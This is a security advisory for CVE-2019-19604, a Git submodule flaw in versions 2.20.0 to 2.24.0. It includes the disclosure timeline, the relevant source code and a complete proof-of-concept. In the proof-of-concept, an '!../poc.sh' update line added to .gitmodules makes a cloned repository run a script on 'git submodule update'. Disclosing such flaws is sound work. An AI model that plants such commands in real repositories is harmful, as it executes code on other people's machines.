# Git `submodule update` command execution

The `git submodule update` operation can lead to execution of arbitrary shell commands defined in the `.gitmodules` file.

# Affected Products

* [Git](https://git-scm.com/) version 2.20.0 to 2.24.0

# Fixed versions

* Git v2.24.1, v2.23.1, v2.22.2, v2.21.1, v2.20.2

# Disclosure Timeline

* 2019-11-11 initial report to the git-security mailing list
* 2019-12-10 Git v2.24.1, v2.23.1, v2.22.2, v2.21.1, v2.20.2 released

# CVE Identifier

* [CVE-2019-19604](https://nvd.nist.gov/vuln/detail/CVE-2019-19604)

# Details

The manpage of `git-submodule` states the following configuration option for submodules:


> The following update procedures are only available via the submodule.<name>.update configuration
> variable:
>
> custom command
>     arbitrary shell command that takes a single argument (the sha1 of the commit recorded in the
>     superproject) is executed. When submodule.<name>.update is set to !command, the remainder after the
>     exclamation mark is the custom command.

This configuration value can be defined in the `.gitmodules` file within a Git repository. The setting, however, will be overwritten when the flag `--init` is being used. 

The method `init_submodule` within `builtin/submodule--helper.c` takes care of this:

```c
if (git_config_get_string(sb.buf, &upd) &&
	    sub->update_strategy.type != SM_UPDATE_UNSPECIFIED) {
		if (sub->update_strategy.type == SM_UPDATE_COMMAND) {
			fprintf(stderr, _("warning: command update mode suggested for submodule '%s'\n"),
				sub->name);
			upd = xstrdup("none");
		} else
```

The above code will set the update strategy to `none` within `.git/config` of the repository containing the submodule. 

The command will only get executed in a corner case when calling `--init` without an `submodule.<name>.update` strategy is followed by a subsequent call to `git submodule update` with an `update` strategy set to an external command within `.gitmodules`.

## Exploitation Example

First we prepare a repository:

```
joern@hostname ~/tmp $ mkdir example
joern@hostname ~/tmp $ cd example 
joern@hostname ~/tmp/example $ git init .
Initialized empty Git repository in /home/joern/tmp/example/.git/
joern@hostname ~/tmp/example $ git submodule add https://gitlab.com/joernchen/xxeserve.git
Cloning into '/home/joern/tmp/example/xxeserve'...
remote: Enumerating objects: 34, done.
remote: Counting objects: 100% (34/34), done.
remote: Compressing objects: 100% (29/29), done.
remote: Total 34 (delta 14), reused 0 (delta 0)
Unpacking objects: 100% (34/34), done.
joern@hostname ~/tmp/example $ git commit -m "first commit"
[master (root-commit) 9ed9add] first commit
 2 files changed, 4 insertions(+)
 create mode 100644 .gitmodules
 create mode 160000 xxeserve
 ```

So far there's nothing special about the repository:

```
joern@hostname ~/tmp/example $ cat .gitmodules 
[submodule "xxeserve"]
        path = xxeserve
        url = https://gitlab.com/joernchen/xxeserve.git
```

Next the repository gets cloned:

```
joern@hostname ~/tmp $ git clone --recurse-submodules example test  
Cloning into 'test'...
done.
Submodule 'xxeserve' (https://gitlab.com/joernchen/xxeserve.git) registered for path 'xxeserve'
Cloning into '/home/joern/tmp/test/xxeserve'...
remote: Enumerating objects: 34, done.        
remote: Counting objects: 100% (34/34), done.        
remote: Compressing objects: 100% (29/29), done.        
remote: Total 34 (delta 14), reused 0 (delta 0)        
Submodule path 'xxeserve': checked out 'c4a859fb16e2c65a1708d1c0a404f339191fd8e9'
```

Back in the origin repository we change the submodule and introduce a command in `.gitmodules`:

```
joern@hostname ~/tmp/example $ echo -e '#!/bin/bash\x0aid>/tmp/poc.txt' > poc.sh
joern@hostname ~/tmp/example $ echo '        update = !../poc.sh' >> .gitmodules
joern@hostname ~/tmp/example $ chmod +x poc.sh 
joern@hostname ~/tmp/example $ cd xxeserve 
joern@hostname ~/tmp/example/xxeserve $ git checkout 0f5c204 
Previous HEAD position was c4a859f Merge pull request #4 from mccabe615/master
HEAD is now at 0f5c204 Update README.md
joern@hostname ~/tmp/example/xxeserve $ cd ..
joern@hostname ~/tmp/example $ git add .
joern@hostname ~/tmp/example $ git commit -m 'second commit'
[master ec3abce] second commit
 3 files changed, 4 insertions(+), 1 deletion(-)
 create mode 100755 poc.sh
```

In the cloned repository the command will be run after `git pull` followed by `git submodule update`:

```
 joern@hostname ~/tmp/test $ git pull
remote: Enumerating objects: 6, done.
remote: Counting objects: 100% (6/6), done.
remote: Compressing objects: 100% (3/3), done.
remote: Total 4 (delta 1), reused 0 (delta 0)
Unpacking objects: 100% (4/4), done.
From /home/joern/tmp/example
 + 113237f...ec3abce master     -> origin/master  (forced update)
Updating 9ed9add..ec3abce
Fast-forward
 .gitmodules | 1 +
 poc.sh      | 2 ++
 xxeserve    | 2 +-
 3 files changed, 4 insertions(+), 1 deletion(-)
 create mode 100755 poc.sh
 joern@hostname ~/tmp/test $ git submodule update
Submodule path 'xxeserve': '../poc.sh 0f5c2043db22ff091b800cb6c61e015492ad0885'
 joern@hostname ~/tmp/test $ cat /tmp/poc.txt 
uid=1000(joern) gid=1000(joern) groups=1000(joern),3(sys),90(network),98(power),991(lp),998(wheel) 
```

# External References

* [Git release announcement](https://public-inbox.org/git/xmqqr21cqcn9.fsf@gitster-ct.c.googlers.com/T/#u)

# Credits

Joern Schneeweisz - GitLab Security Research Team
